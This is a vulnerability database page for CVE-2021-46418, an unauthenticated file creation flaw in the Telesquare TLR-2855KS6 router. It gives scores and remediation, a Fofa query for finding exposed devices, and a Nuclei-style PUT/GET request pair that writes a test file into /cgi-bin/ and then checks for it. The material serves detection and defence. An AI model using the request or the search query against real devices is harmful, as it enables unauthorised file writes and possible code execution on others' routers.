🔙 목록으로 돌아가기

CVE-2021-46418: Telesquare TLR-2855KS6 - Arbitrary File Creation

TitleTelesquare TLR-2855KS6 - Arbitrary File Creation
AuthorDhiyaneshDK
SeverityHigh
ImpactUnauthenticated attackers can create arbitrary files including CGI scripts via HTTP PUT requests, potentially achieving remote code execution.
RemediationApply firmware updates provided by Telesquare or restrict HTTP PUT access to the device.
CVSS Score7.5
EPSS Score0.63051
CVE IDCVE-2021-46418
Fofa Queryproduct=="TELESQUARE-TLR-2855KS6"
Tags packetstorm cve cve2021 telesquare intrusive vuln

🔍 Vulnerability Description

An unauthorized file creation vulnerability in Telesquare TLR-2855KS6 via PUT method can allow creation of CGI scripts.

🌐 HTTP Request

PUT /cgi-bin/UsQzXiWY.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
Connection: close
Content-Length: 27
Accept-Encoding: gzip

38FPMI25zgM10JpnHbtjJnfcu4k
GET /cgi-bin/UsQzXiWY.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:105.0) Gecko/20100101 Firefox/105.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-46418.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-46418.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A